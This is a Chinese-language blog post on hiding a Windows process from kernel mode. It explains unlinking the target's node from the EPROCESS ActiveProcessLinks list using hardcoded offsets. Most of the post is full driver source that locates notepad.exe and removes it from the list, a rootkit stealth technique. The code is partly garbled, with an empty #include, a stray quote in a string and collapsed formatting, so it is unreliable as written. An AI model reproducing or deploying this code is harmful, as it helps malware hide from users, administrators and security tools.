【進程隱藏之內核】EPROCESSSS結構體

(相關資料圖)

進程隱藏之內核實現

1、在內核模式下，系統為每個進程維護了一個EPROCESS結構體，系統所有的進程是通過EPROCESS結構體中的一個ActiveProcessLinks指向的雙端鏈表連接起來的，通過winDBG內核調試工具就可以發現并獲取其相對于EPROCESS結構體的地址(0x88)，這樣我們可以通過遍歷該循環鏈表找到我們的目的進程將其鏈表的節點刪除即可隱藏該進程。（EPROCESS中進程PID相對地址為ox84，進程名字相對地址為0x174）。

代碼如下:

/****************************   在內核模式下隱藏進程      sky_2012.12.13****************************/#include#define DWORD ULONGvoid DriverUnload(IN PDRIVER_OBJECT Driver_Object);NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj, IN PIRP pIrp);//根據進程Pid找到進程DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg);ANSI_STRING Process_Name;NTSTATUS DriverEntry(IN PDRIVER_OBJECT Driver_Object, IN PUNICODE_STRING RegisterPath){PLIST_ENTRY  pre_ActiveProcessLink;int flg = 0;DWORD preprocess = 0x00000000;CHAR *string1 = "notepad.exe";Driver_Object->MajorFunction[IRP_MJ_CREATE] = HelloDDKDispatchRoutine;Driver_Object->MajorFunction[IRP_MJ_CLOSE]  = HelloDDKDispatchRoutine;Driver_Object->DriverUnload = DriverUnload;//找到我們要保護的進程的前一個的EPROCESSRtlInitAnsiString(&Process_Name,string1);preprocess = FindProcessEPROCESS(&Process_Name,&flg);//根據進程的ActiveProcessLink刪除掉我們的目的進程的ActiveProcessLink的連表節點if(flg){pre_ActiveProcessLink = (PLIST_ENTRY)(preprocess);pre_ActiveProcessLink->Flink = pre_ActiveProcessLink->Flink->Flink;pre_ActiveProcessLink->Flink->Blink = pre_ActiveProcessLink;KdPrint(("Delete Success!\n"));}else{KdPrint(("notepad.exe dos"nt exist!\n"));}return STATUS_SUCCESS;}DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg){ANSI_STRING CurName;PLIST_ENTRY   cut_ActiveProcessLink = 0x00000000;DWORD CUR_EPROCESS = 0x00000000;DWORD curent_id = 0;//記錄當前idDWORD start_id =0;int count = 0;//記錄id總數CUR_EPROCESS = (DWORD)PsGetCurrentProcess();curent_id = *((DWORD*)(CUR_EPROCESS + 0x84));start_id = curent_id;RtlInitAnsiString(&CurName,(char*)CUR_EPROCESS + 0x174);cut_ActiveProcessLink = (PLIST_ENTRY)(CUR_EPROCESS + 0x88);//如果相同if(!RtlCompareString(PsName, &CurName,FALSE)){*flg = 1;return ((DWORD)(cut_ActiveProcessLink->Blink));}//接著遍歷while(1){count++;cut_ActiveProcessLink = cut_ActiveProcessLink->Flink;RtlInitAnsiString(&CurName,(char*)cut_ActiveProcessLink - 0x88 + 0x174);curent_id = *((DWORD*)((DWORD)cut_ActiveProcessLink - 0x88 + 0x84));if(!RtlCompareString(PsName,&CurName,FALSE)){*flg = 1;return ((DWORD)(cut_ActiveProcessLink->Blink));}else if (count>=1&&(start_id == curent_id)){KdPrint(("沒有找到!\n"));return 0x00000000;}}}//默認的例程NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj, IN PIRP pIrp){NTSTATUS status = STATUS_SUCCESS;KdPrint(("Enter HelloDDKDispatchRoutine\n"));// 完成IRPpIrp->IoStatus.Status = status;IoCompleteRequest(pIrp, IO_NO_INCREMENT );KdPrint(("Leave HelloDDKDispatchRoutine\n"));return status;}//設置卸載例程void DriverUnload(IN PDRIVER_OBJECT Driver_Object){KdPrint(("DriverUnload!\n"));}